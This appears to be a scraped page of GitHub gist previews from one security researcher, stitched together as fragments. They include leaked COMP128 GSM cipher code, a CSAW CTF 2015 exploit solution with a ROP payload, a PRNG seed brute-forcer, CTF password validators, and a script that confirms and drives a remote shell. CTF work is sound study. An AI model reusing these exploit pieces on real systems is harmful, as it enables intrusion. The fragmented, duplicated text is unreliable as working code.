vanhoefm / comp128.c
Created Feb 5, 2016
Leaked COMP128 algorithm (versions 2 and 3) and a refactored, easier-to-understand version.
/** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <time.h>
static uint8_t table0[] = {
197, 235, 60, 151, 98, 96, 3, 100, 248, 118, 42, 117, 172, 211, 181, 203,
vanhoefm / csaw-ctf-2015_exploit-500.py
Created Sep 21, 2015
Solution for the exploit-500 challenge of CSAW CTF 2015
#!/usr/bin/env python2
from pwn import *
# Stack layout of vulnerable functions:
#
# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#
payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
vanhoefm / findseed
Created Mar 23, 2015
Find PRNG seed
#include <stdio.h>
#include <stdint.h>
int is_correct(uint32_t seed) {
uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
for (uint32_t i = 0, x = seed; i < 5; ++i) {
x = (214013 * x + 2531011) & 0xFFFFFF;
if (hexkey[i] != (x >> 16)) return 0;
}
return 1;
vanhoefm / findseed
Created Mar 23, 2015
Find PRNG seed
#include <stdio.h>
#include <stdint.h>
int is_correct(uint32_t seed) {
uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
for (uint32_t i = 0, x = seed; i < 5; ++i) {
x = (214013 * x + 2531011) & 0xFFFFFF;
printf("%X\n", x);
if (hexkey[i] != (x >> 16)) return 0;
}
function validate() {
var x = document.forms["formxx"]["pwz"].value;
if (!x.match(/^[A-Za-z]+$/))
return false;
if (!sha1(x).match(/^ff7b948953ac/))
return false;
alert("Flag: " + x);
return true;
function validate() {
var x = document.forms["formxx"]["pwz"].value;
alert(x);
if (x == null || x == "") {
alert("Password must be filled out");
return false;
}
if (!x.match(/^[A-Za-z]+$/)) {
alert("Bad charset");
# -------------- netcatlib.py -----------------------------------
import socket
class Netcat:
# TODO: ip and port should be optional, and an open() method should be added
# TODO: specify a timeout argument as well?
def __init__(self, ip, port):
    """Open a TCP connection to (ip, port) and start with an empty receive buffer."""
    # Receive buffer for data read from the socket but not yet consumed;
    # presumably drained by read helpers later in the class - verify against
    # the rest of the file.
    self.buff = ""
    self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Blocking connect with no timeout set on the socket (see the class-level TODO).
    self.soc.connect((ip, port))
call 0x80486d0 <printf@plt>
movl $0x8049f3a,(%esp)
call 0x8048750 <puts@plt>
mov -0xc(%ebp),%eax
leave ; equivalent to movl %ebp, %esp
; popl %ebp
ret
; Dump of assembler code for function printf:
push %ebp ; save old frame pointer
mov %esp,%ebp
push %ebx
call 0xb7e8ba0f
add $0x10dd5b,%ebx
sub $0xc,%esp
lea 0xc(%ebp),%eax
mov %eax,0x8(%esp)
mov 0x8(%ebp),%eax
# Step 4 --- Test whether we've got our shell and let the magic happen
nc.write("echo \"GOT A SHELL\"\n")
nc.read_until("GOT A SHELL\n")
print "\nSUCCESS! We have a shell!\n"
while True:
command = raw_input("$ ")
nc.write(command + "\n")
# quick and dirty way to detect end of output